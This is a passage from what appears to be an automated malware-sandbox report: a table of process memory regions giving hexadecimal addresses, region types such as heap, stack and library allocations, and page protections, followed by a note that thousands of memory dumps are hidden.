|
heap
|
page read and write
|
||
281AB6C2000
|
heap
|
page read and write
|
||
1C098C28000
|
heap
|
page read and write
|
||
2224ECE0000
|
trusted library allocation
|
page read and write
|
||
12633000
|
trusted library allocation
|
page read and write
|
||
2462D0C0000
|
heap
|
page read and write
|
||
1DFF3090000
|
direct allocation
|
page read and write
|
||
227EEFB0000
|
heap
|
page read and write
|
||
2074DB10000
|
heap
|
page read and write
|
||
7FFD9AAC0000
|
trusted library allocation
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
1205000
|
heap
|
page read and write
|
||
160026CB000
|
heap
|
page read and write
|
||
174F1A60000
|
trusted library allocation
|
page read and write
|
||
FF5000
|
heap
|
page read and write
|
||
23BCC932000
|
heap
|
page read and write
|
||
C2F0FCE000
|
stack
|
page read and write
|
||
174F0F24000
|
heap
|
page read and write
|
||
281AB633000
|
heap
|
page read and write
|
||
281AB6B7000
|
heap
|
page read and write
|
||
21B7950A000
|
heap
|
page read and write
|
||
1F224DA0000
|
trusted library allocation
|
page read and write
|
||
1B3F6E00000
|
heap
|
page read and write
|
||
281AB6A0000
|
heap
|
page read and write
|
||
7FFD9A880000
|
trusted library allocation
|
page execute and read and write
|
||
2646A132000
|
heap
|
page read and write
|
||
2538CA20000
|
heap
|
page read and write
|
||
26469A10000
|
heap
|
page read and write
|
||
7FFD9A9C0000
|
trusted library allocation
|
page read and write
|
||
174F1A2F000
|
trusted library allocation
|
page read and write
|
||
1FCD6060000
|
heap
|
page read and write
|
||
281ABF3D000
|
heap
|
page read and write
|
||
16CEEF33000
|
heap
|
page read and write
|
||
16CEEF56000
|
heap
|
page read and write
|
||
26469ABE000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
24647368000
|
heap
|
page read and write
|
||
23BCD028000
|
heap
|
page read and write
|
||
1CA952C2000
|
heap
|
page read and write
|
||
12E41000
|
trusted library allocation
|
page read and write
|
||
1DFEFC28000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
2224F030000
|
trusted library allocation
|
page read and write
|
||
7FFD9A7D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A7C3000
|
trusted library allocation
|
page execute and read and write
|
||
19525F96000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
7FFD9A7D4000
|
trusted library allocation
|
page read and write
|
||
2684AF20000
|
heap
|
page read and write
|
||
281AB6B1000
|
heap
|
page read and write
|
||
2DDB4EDD000
|
heap
|
page read and write
|
||
174F1A28000
|
trusted library allocation
|
page read and write
|
||
281AC8D0000
|
direct allocation
|
page read and write
|
||
195267FA000
|
heap
|
page read and write
|
||
62849DC000
|
stack
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
227EEFB5000
|
heap
|
page read and write
|
||
1FCD67EA000
|
heap
|
page read and write
|
||
2DDB4EC6000
|
heap
|
page read and write
|
There are 4008 hidden memdumps, click here to show them.